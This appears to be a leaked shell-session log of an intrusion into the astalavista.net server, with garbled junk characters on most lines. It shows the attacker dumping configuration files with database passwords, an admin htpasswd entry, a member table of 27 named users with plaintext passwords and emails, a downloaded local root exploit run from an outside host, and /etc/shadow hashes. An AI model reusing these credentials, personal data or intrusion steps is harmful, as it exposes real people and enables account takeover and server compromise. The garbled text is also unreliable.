9 c1 l$ V6 M6 P5 q6 B/ `- g1 }5 m" ?drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
9 i _; ] H5 p. y( ^-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
. a$ |1 v! E4 f- qdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config [9 b0 J3 O! P/ n+ _
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
2 W J2 U0 j3 f4 u" N1 s+ ldrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
2 r. B6 c! Z- \/ f2 M8 | z8 C- R-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
8 C/ Z6 T( r$ L) Q& `-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
1 K) N# y+ ^& E8 r" c. Sdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
3 S* A2 |; u) ~4 N& j7 I# s3 D0 h6 vdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
- X C& q% D$ x" }-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
% q/ r' ~. T0 v9 H' Q: N6 @7 r-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess0 t4 G5 ~( d) d) y& Z
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php6 K0 X( Z9 F# g* ^) A
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html3 x' |- r+ {1 k+ m% @+ q
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
% H4 L: ?- i) @; @. `% ^-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
/ K$ |0 j" X5 B# a( s4 B& g- |( |( A1 \-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
+ |) o8 D2 Z, h' ndrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ ~ L* v$ H9 W+ K
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
# W# E) A' Y2 T" y F0 e6 Ldrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib( Q6 S( C/ J1 t% [8 m" U- U
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log. j7 q* S/ s+ }0 M+ @, z4 [( W, C7 @
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
6 I. j: q5 f4 D( e8 S* j7 }8 [drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata) i! C \! \# _; U3 Z, a) N4 [
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
( `3 S: n7 S: z; `& B-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
6 C( _9 x% Y9 U% Q! Rdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re6 [% L8 j' @# G5 R( h& j7 F
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
9 z7 _/ k* M: Ydrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
4 ^& z3 X9 s6 J) T' D4 _0 @drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
" `2 R2 H, e$ R+ h Vdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com6 D3 t6 U, L: Y6 E
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes# ?, _7 t7 m# r/ |
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
& m" \$ F+ K e% R! ^3 D: o3 D5 s/ mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl9 h- J( F- ^1 r0 d' A$ C B
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
1 A3 _ h: H& E5 ]7 Kdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
- e* H. R h* Q8 n-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
2 _% e g4 O: j Rdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
# d- j1 g9 _$ Q& E
1 g" V& V& t; m+ H: ~! _1 Xsh-3.2$ head -20 index.php
7 `# c6 i& [/ V P<?PHP
0 ?6 o2 K% Q, {/ p0 J: o( f/**; D3 s9 E) G3 w: x$ {
* Mainfile (external) for astalavistaNET v2.0# p: V' B) V9 \- m$ m# v
* z2 Q4 T3 D: _# K- e/ c6 }
* @copyright Astalavista IT Engineering GmbH* j: K! I0 B% u* s0 m! B1 Q% g
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>6 }' E0 n: \1 @9 _' d! H) O! ?
* @version 1.0
2 t1 Q6 @2 b6 G' n. n*/
& N7 s% t( b, Y$ D9 E# y* |4 F% @0 F8 q1 A, `1 m5 F" C
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {, d3 f! T0 Y6 V
$dontStartSession = false;0 _! {: k2 f6 Y. h. V/ ^% O
} else {. Y d( L* a" J8 a
$dontStartSession = true;
; Z" Q2 d" a' ]+ c; q; s }
! V1 k% j, N- }: E; }1 z3 U7 }8 q" ~ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);, ~4 S; b: H4 A" _" u' X
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);: A0 q$ y* R8 i, i
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
1 T1 z! n0 a; @6 K V# e/ \: ?, M require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);+ y0 _, `1 s* h
% c4 L# z+ v1 t& |
sh-3.2$ cd config
8 f2 }" @' R7 N- xsh-3.2$ ls -la6 b; {8 r3 r0 e: w2 B3 l: N9 {
total 328 S, P0 l2 D7 F" i4 r7 Z5 D X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
2 w X! g+ f0 U6 U S" ^' X0 Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
8 [0 L/ t( S# v/ B/ w8 u-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
. x. r% L1 Z6 \+ e-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php! S7 g& [( L9 G# e% ?
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
$ I& F& P& A+ _9 {! a3 J" B: ]-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
0 h9 ~) o9 z3 n-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php/ C- I8 b2 i0 b. f( ~ Q7 r F
1 I) i) P( A+ o4 V; H6 X9 [sh-3.2$ cat com.conf.php
, h O$ U; w7 T: b* _[snip]
; e) N: H b3 ?//member-database
& M( K$ o2 N" X0 M' V4 Q$_CONFIG['db_mem_server'] = ‘localhost’;
9 l1 b( r" a8 p1 q$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
& e# j; d7 d- p- o Q$_CONFIG['db_mem_user'] = ‘astanet_db’;
; n$ F' w1 u: F" v: o! g9 {* u3 i6 p$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;9 s/ R6 E: F$ u4 ^, Y4 M: _
$_CONFIG['db_mem_debug'] = false; //true or false0 C4 Q' i4 ^9 |( ~+ I+ r% f2 P
//ads-database
/ B1 L' @7 _1 }7 N$ x$_CONFIG['db_ads_server'] = ‘localhost’;
8 `0 c' W2 H) a2 S. c* a$_CONFIG['db_ads_database'] = ‘astanet_ads’;
p0 S2 c1 r" G. \$_CONFIG['db_ads_user'] = ‘astanet_db’;9 S3 O! B& G0 c! `6 j* w4 O
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;9 _1 A5 v& _" U" h8 N5 K ?8 s, Q. o' m
$_CONFIG['db_ads_debug'] = false; //true or false
/ a7 ~% N( f# Y! |2 S+ o) F//rainbow-database! W0 w `4 {% [' ]; v
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
* A3 J4 r ]7 C% W4 n0 K$_CONFIG['db_rainbow_database'] = ‘rainbow’; d! _7 j) x" e
$_CONFIG['db_rainbow_user'] = ‘dinu’;4 O6 B1 b! T$ H$ w) a# Q/ N4 R
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
+ K6 I1 l0 H' g) p' W5 O; V5 Q; X$_CONFIG['db_rainbow_debug'] = false; //true or false
4 T: {6 O4 _: M; K, v" H# g6 [, a//mailing lists database7 v$ p/ p4 ?4 M. k- W2 R) C
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;' w; E$ i4 h; q
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
$ i9 T. h3 r0 y* ?$ b! ^, m, p$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;" b9 ~. U9 M4 P$ E
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;+ U7 \. s% J" d9 _0 u; f
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
% d2 x$ I- c( S5 ^. t4 `7 z//paypal
2 B9 ]; Z/ c: T( g2 C: ^$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
! h3 ]' ?, j4 ^+ u* f! i" h$_CONFIG['sub_pp_cmd'] = ‘_xclick’;' j; U2 n! n& { l3 T
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;5 N5 {: ?' V" B( K7 v8 a
$_CONFIG['sub_pp_noship'] = ‘1′;
# g N; B, P2 Z ]$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;* [$ O+ i- X- H5 o2 k3 w! ^
[snip]$ A0 P8 K% [ T1 p' l. K% F& ?3 [
" I. t( b, n% Q$ d. F/ A9 W+ }# ssh-3.2$ cd ..4 B0 P& {6 e' G) J7 U
sh-3.2$ cd member S3 O b7 p$ H. I) k* t
sh-3.2$ ls -la6 e% e& F& e. I m
total 20
8 `. X, `2 g' Mdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .' a5 J. f3 a A% r& n B: P
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
; P) } P$ X: y, t1 W& o2 O-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess7 v1 L- ?% ?# j! [
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php3 C E: X R' t. b; L- \
sh-3.2$ cat .htaccess
+ G/ Q5 D2 P0 o* b7 {0 X i/ @SecFilterEngine off, K7 i \# {+ R) ?
! u8 X" y$ T" e3 Psh-3.2$ cd ..4 P- u" v, N7 f k5 e3 U8 I
sh-3.2$ cd cron
& }. X& h0 |; W$ u5 bsh-3.2$ ls -la8 g: s3 d# M, z1 V7 B* k
total 168
+ R% }% h4 }' s/ pdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
) ]' t( p8 I' G: Odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 s. U! n- X8 `6 M-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
& E, j* D9 }1 M. q4 z6 A& m+ ^-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
" m6 U! J$ W9 r" ]4 e! l" l9 A2 ?-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php; ?- z+ x, W9 L
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php, L$ O* b2 E3 u1 G) _
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php- E: U/ X% H3 s! w7 S$ x
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; w0 h# C/ A7 n
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
5 e& a* M" k/ i' E& e% D-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php0 W, r# A3 Y( i! L/ _3 H
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh8 H3 ]+ y' h( M
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php1 g) X% c k8 } [$ \3 O- J7 t
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
4 w0 s' m+ H- |) o+ E-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
" `" U8 Y& ]+ x$ K- W) h# k' F-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
; x* v, A+ X8 k' A. ~! B-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php5 O5 F8 N; ^. g2 ~; H s
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
( u' v4 a: \2 K- C& z$ j-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php/ |& n9 Q) _' P6 B' Z+ F
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
+ E9 u% l% n! a# H$ B-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php6 n: O+ A1 S& A3 ]% Q! I9 a# _' T" T
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email+ \' b. r& j0 Z7 d* ?! r1 M2 X& R
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php/ G% |. \& `( j) t, ?
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
7 j: ^% i- K1 c$ ]% F
( }2 q7 D. |% w, I/ @$ j: {sh-3.2$ cd ..: o/ I- |% R$ Z) R5 l) g m* J3 u
sh-3.2$ cd _0073 [5 w, U1 m7 j0 t' w; d {
sh-3.2$ ls -la
% D8 }9 Q! a. P3 y0 v5 w: Y) Ptotal 24
$ ~: B( W% X7 {. {. n9 b7 Odrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
" R4 z& r, x1 Idrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
5 `3 e/ e. U2 ?-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
& i4 _9 u4 y* R8 j' ~-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
4 A3 l1 X8 A1 q( G7 p$ t3 z-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php$ A1 N' ~; c. w, j% w/ A8 @
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap7 r) c2 s: c2 H* I, a) J) ^2 f
1 K3 y7 Y, s, osh-3.2$ cat .htaccess7 f* v B9 a% A! A
authType Basic
! q- t- E# q5 G q4 s9 \authName Admin, p, h8 Q% Z. K( \: ^
authUserFile /home/astanet/auth/.htadm_pwd
7 J% P+ ~% W' K; e4 `3 trequire valid-user
+ P3 w" N, L$ ^+ O: m# \) O
7 m; P1 e2 K& @% `3 N* Y& }' dsh-3.2$ cat /home/astanet/auth/.htadm_pwd: }. c$ i, i7 S7 S6 \, b
admin2net:CR0bl65MwhfT3 ?3 }: |, |% M5 s
! c% d) i: P, b0 G$ [
sh-3.2$ mysql -u astanet_db -p
5 ?' k+ y) |1 x0 d8 g7 n( gEnter password:
$ x; B9 d+ P% S& K- {$ V5 U' x- PWelcome to the MySQL monitor. Commands end with ; or \g.
! l6 U8 `0 {3 T; |, T# \Your MySQL connection id is 275153 T, `% d* p' L
Server version: 5.0.45-community-log MySQL Community Edition (GPL)" a, f& W& q2 ?0 o: j4 G
" T/ O d. M7 Y) S8 N: |2 C eType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., _ M/ g' T) X0 k
5 n! A. r; s1 C) e! [
mysql> show databases;- T! f' m+ S& u7 R
+———————–+
* I& [& k1 g- |% j3 R7 }- ^| Database |
; o" B8 B# C1 k+———————–+7 V' A% z' ]8 T% u
| information_schema |
% p1 z0 r* C6 P X& d| astanet_ads |
) q z1 q. B/ Q2 r2 J| astanet_mailing_lists |) D) v! M' d: V) T, o
| astanet_mediawiki |( F8 k$ c) \4 k$ S1 g
| astanet_membersystem |
9 o3 v$ b8 K! G, ? C: j( h1 `4 c, d| test |- M' S! \/ d8 V# H( ]. a
+———————–+
0 e1 I; N( m( p1 p/ V6 rows in set (0.00 sec)
1 x- Z& z' J/ E- p0 z7 Z# E# e- d% N2 ]& m0 a+ R! C- ?* t0 @9 H
mysql> use astanet_membersystem
* S. G$ ]0 V$ J" U8 MDatabase changed. f3 S% D4 N2 m4 D' H
mysql> show tables;
: e: ]/ W) j- ]3 m+———————————–+
]6 b( r5 C || Tables_in_astanet_membersystem |4 e4 v5 ]; ~, [* @2 c
+———————————–+
9 k5 v& E4 N: F' b6 R| blacklist_categories |
6 X; A. K2 t! O' ~8 p" B| blacklist_content |
% z# _6 w- P* \/ h" _7 F6 P| blacklist_levels |
6 B) v1 J) @, j8 M; ^6 _' m| blacklist_mcset |
: K$ o1 ]. E7 e% D) Y# C| dir_categories |
8 D/ f( ?9 s5 M* A6 X| dir_comments |
) h+ V! T0 C! g; K( d8 [| dir_links |
/ N% o5 Z. S- c9 Y+ m| dir_temp |7 M' I6 t% q* h# a: L3 e, S m! p
| dir_votes |+ Z r5 p3 u& n8 }5 ]5 M
| documents |
`9 ?: r4 C" c8 U# {: P2 v| documents_categories |; D) b4 p* F0 Y( z
| email_content |
0 t) P" r5 J" O" B+ X, i| email_settings |
% Z5 {# a7 G/ S. g| exploits |
! p! B2 Q( u y% H| exploits_categories |
! @, m4 n7 z& H! P# j- C/ ]| exploittree_categories |6 b4 D7 Y( p4 d9 D* W
| exploittree_exploits | M" M8 d# W) r3 R
| home_values |
+ J3 F: j! i" s3 F8 @+ Y" W" D/ i| iso_countries |
! L: C& Q' q: N1 x1 o4 T| links_categories |
* A" l7 |7 W1 K! V! p, t| links_records |
, R: ]2 ^: s W6 c9 Z| links_unauth |+ o' ]& n; N2 ~2 D
| links_votes |
2 |! p+ ] w8 S; M$ q5 L( a| log |
& w) b2 }% ^) f: ^: U| news_categories |, P& w5 E5 d" N" p0 |$ H9 G
| news_comments |
. ^% m. g4 o9 m| news_emoticons |
1 V. n9 R4 ]3 v8 ~1 I1 g a| news_latest |
0 t$ d a/ {+ V7 J| news_messages |7 D P4 h! k$ q' ~) R
| news_statistics |
0 z. L9 J- X" J% J$ }8 F5 ]| news_votes |8 t3 }- ?. X! y7 t/ L8 O- z+ x: P
| prices_content |9 t4 o& S$ _+ O+ z8 M) j; _
| prices_offers |
% i; T' q. D& C5 c6 I# M b| rss_settings |6 [; ~% N3 ?2 e, N7 @0 Q, I) T
| sessions |. _$ @5 a/ e& [0 E
| stats_signups |
+ }4 r& G; i ]+ _) Y- a2 D| u2u2 |6 ^& @6 p+ I2 ^& J; Y
| u2u_contact |; Y6 d" K( O8 t4 L' S
| u2u_settings |! A6 J; N" K) x$ i0 J
| user_keywords_selected_categories |
! X, u5 n/ b/ C7 f| users |- d" F/ S. ]0 `% o8 o
| users_ipn_test |+ P' k: W( Z4 \$ i% n
| users_keyword_values |, r4 t( k S$ ^6 u. ]0 }6 u$ g$ g: H5 r
| users_profile |
- m9 X* C0 `* x# D6 K( O| users_temp |) ^& X9 j4 E: `. ^/ d# ]( A0 x
| users_upgrade |1 z- \# @# h* g4 R
+———————————–+
* }& E" f& n% A; z# w, o46 rows in set (0.00 sec)
; \1 E2 S5 E0 N4 c, s/ |7 p( P
, p1 ?5 q, ~+ c' h0 F7 ?' {mysql> describe users;
* ?9 [6 }5 T( F4 _+————————–+————————————–+——+—–+———————+—————-+
+ L4 V: F) d. U: R/ C! p| Field | Type | Null | Key | Default | Extra |
. W3 _/ A; u% W- e) G* R/ B+————————–+————————————–+——+—–+———————+—————-+ B+ C# ~8 }9 k, b' ^' B
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
# e1 s+ g: n6 C, m& ~/ n8 m2 l| user | varchar(50) | NO | | | |) E" a1 U9 ^& L" G( n# A. `8 Y
| nickname | varchar(30) | NO | MUL | anonymous | |/ W: {$ f3 {3 o/ Z+ j
| password | varchar(30) | NO | | | |7 j9 K+ M5 I* X- W
| userlevel | tinyint(3) | YES | MUL | NULL | |
% ? H& L6 n+ h) Q8 g| exp | int(8) unsigned | NO | | 0 | | u. t. ?& v- p! \
| email | varchar(50) | NO | | | |
1 n8 O! j2 k; {: k, n| ip | varchar(15) | NO | | 0 | |' e" p' ]# s# C* U, M2 A
| proxy | set(’0′,’1′) | NO | | 0 | |, |1 _! C5 E" f$ O$ ^. ]
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
1 P# t4 y0 K" c9 {$ {| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |: v8 Q5 k3 f! e0 Z' B& ]
| anz_in | tinyint(1) | NO | | -1 | |6 |4 N( u x# {+ [5 e! `
| status | tinyint(1) unsigned | NO | | 0 | |1 M9 W& O" Q b$ c- F( v8 U5 Q% Y* R
| checked | set(’0′,’1′,’2′) | NO | | 0 | |$ a5 S" M y2 `2 Q! s9 w
| freemember | set(’0′,’1′) | NO | | 0 | |2 n# G% ]) s3 j' u! M# b$ b
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |5 E: X$ H j( r8 J R
| lang | tinytext | NO | | | |
) M$ _5 a8 ~( e# d| adid | smallint(6) | NO | | 0 | |
- H$ c' Q) E9 H' o$ h' l| pp_txn_id | varchar(255) | YES | | NULL | |& C! I: V7 H8 L8 m7 _% g
| cnb_transaction_id | varchar(255) | YES | | NULL | |& x0 t* U: n; l+ w- P4 T
| cnb_order_id | varchar(255) | YES | | NULL | |
' A+ l9 x2 t6 V) K| cnb_user_id | int(11) | YES | | 0 | |1 }7 ^" ?2 U7 I' C# a
+————————–+————————————–+——+—–+———————+—————-+' ^0 u4 Z9 o1 J3 d) @: G a
22 rows in set (0.01 sec), T" g+ ?: I: C. U; h% |. r
( U+ ^9 S/ Q' l! f, Y) l! gmysql> select count(*) as skids from users;
/ @1 ]" S8 E& V4 y# N7 {# `! m+——-+
" h4 i, ?! l. O+ h( g" v- U| skids |
* Y! L1 c+ K2 J/ q1 r( z+——-+, m) }7 @. m0 u
| 25199 |/ }/ p" E8 g$ J, e" ?+ z4 f4 s3 t
+——-+- c% a+ R) L; u2 C
1 row in set (0.00 sec)
1 ^( H6 {4 ~& `7 |. \3 F2 h6 a9 e) O8 e# S1 _- p0 t; u3 J& B* _1 X
mysql> select user,nickname,password,email from users where userlevel = 1;7 j- {4 ] f+ j
+————————–+———————-+——————+———————————–+
* U, L3 Z2 z' n3 I- d; W# E| user | nickname | password | email |9 E* ^; K% ^- E+ u
+————————–+———————-+——————+———————————–+
5 u2 `* u. g! H' X0 m| pascal | prozac | astaman3 | 链接标记info@astalavista.net |2 R9 J+ v1 U6 G
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
2 v X' e4 _( }' z| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |! D/ l5 f2 c. n1 o, \/ Q+ a8 s) T% v
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
9 L+ T4 s i9 Q+ I( k) A| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
/ B4 J2 p5 }5 p: G' ]| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
# g6 l! t8 ]& g! b| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
( H' s6 E" S4 ?0 A- A0 g1 p| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com | O, d7 U/ J) ]" d( X9 u
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |. t2 \. {* B6 L
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |1 {* R7 A2 P+ G$ X5 B
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
4 `* i4 N+ W$ I. Q+ N& J| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
3 `& N/ H0 n) f" d| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |8 P1 W8 {" i7 l' W3 F
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
3 Z |- o; a; ^) N, w; @| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
& U( ~$ Y9 L5 p% h( i( U| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
8 V! z8 ^" v% A1 S8 b, h6 Y3 _| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
. ~! K/ }( c% D9 H1 N1 x) M| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |( @7 {2 ^- j3 ~ q
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |# y" ^- ^" g9 F$ Y: ]" n
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |0 O5 F4 ~; t( t9 l* U
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |+ n( K9 C2 o3 |5 O; U
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | ~/ r9 N9 v( `8 v1 n1 M
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |( }; O4 f+ }- u' e% a# x" {& O0 @0 G
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
/ A6 V( Z- H8 |) O| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
* n7 O8 D5 {& `6 i" z1 F. I7 [| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |0 ?; X( I8 E8 _
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |9 B* |3 K5 L* {$ R6 v7 H. M$ t
+————————–+———————-+——————+———————————–+3 ?7 h' m w+ ]0 J
27 rows in set (0.00 sec)5 V( t1 K( c, g& M- p9 e G' o: w
^0 ]6 Z+ g4 w0 [mysql> exit;
) r9 X* \4 M$ Y$ m6 SBye, ]7 M6 ], m3 d: {, J/ t
7 v# N: I7 k* d. R; z6 W" }! @[~] plaintext passwords? yes,5 Q! T( v: }: R
Those so called “security professionals” who charge you $6.66 / month to
* Y/ ?' p( r. ~3 [register at their hack-proof portal, save your passwords in plaintext…
5 Z# P) O$ n1 d& ?brilliant!
* p3 B5 o' S6 Z7 H: G$ i& |7 e# c, G% |1 J1 U, t6 {# q1 j
[~] This been fun but we want more.8 D; E& W' |2 q1 E( D/ Z+ a) F
4 ^" S8 C; H* q8 J& }
sh-3.2$ uname -a9 v+ c; g- u: ?. Z
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux& N8 b& S d5 `' p3 s! _' w
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
3 B) L! E9 O5 _" M+ c3 Z+ h c–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
R. Y, t' U! Y; `2 ?Resolving anti.sec.labs… 13.33.33.37
6 D* j( a1 `% b# Q; U6 }Connecting to anti.sec.labs|13.33.33.37|:80… connected.
$ Q8 w8 H3 L6 WHTTP request sent, awaiting response… 200 OK* ]! B* d$ R- n, B
Length: 18200 (18K) [text/plain]
5 m' k. }2 i" E0 s: H" }Saving to: `g0troot’
/ g. [& N/ j0 M! W! {
0 M" a& B/ }! x$ {% h( P" P, b% X1 e3 l100%[=========================================================================================================================================>] 18,200 58.6K/s in
$ q1 `( ^6 c; h/ p* @( N0.3s
# M2 \/ v7 N: A- Y6 p& u2 c3 ^# `1 z4 j( ]$ y# _3 p x
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]' \" i8 l# g- a5 ~+ [
' `" y; }+ x I. x2 [7 a1 M8 r
sh-3.2$ ./g0troot -i x86_64; G* ?( o& ~/ K" l/ e! Z# z- _3 g: D
[+] g0troot - anti.sec.labs# L9 X. j( e8 }. Y9 v# I2 A
[+] Target: 2.6.18-128.1.10.el5" W9 @( X, P+ L) Q& [
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]9 y, k, V( z. y- \- U# F
2 r- O6 S5 h, Z# S& W2 r
[+] r00tr00t
+ o C7 _2 `7 h1 d[~] Executing shell…
; }' W6 ^ C! k) B. x7 G
' F7 `( I, q2 I. t$ z2 r8 U# Ssh-3.2# id
, l- i# S5 A# guid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
( c; p% {. E4 t p: k3 s; q' T% {
2 b9 H0 T3 }7 q/ l4 Z3 Qsh-3.2# cat /etc/shadow
' K& Q+ [" U) A# g/ V8 froot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
\) G* Z( y- V: b5 ?[snip]! E7 k7 |- G' M, C% I6 b+ `
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::) T0 x& D8 _3 S; X
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
3 ^/ T, p. B) ?7 |$ p3 ~com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
; f8 A/ |3 z9 w# |& Wastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::, d8 ~3 g0 W8 b& V; S% ?
4 j. V( j+ |, o! E' m4 B* [/ v. z% U; Psh-3.2# cat /etc/motd
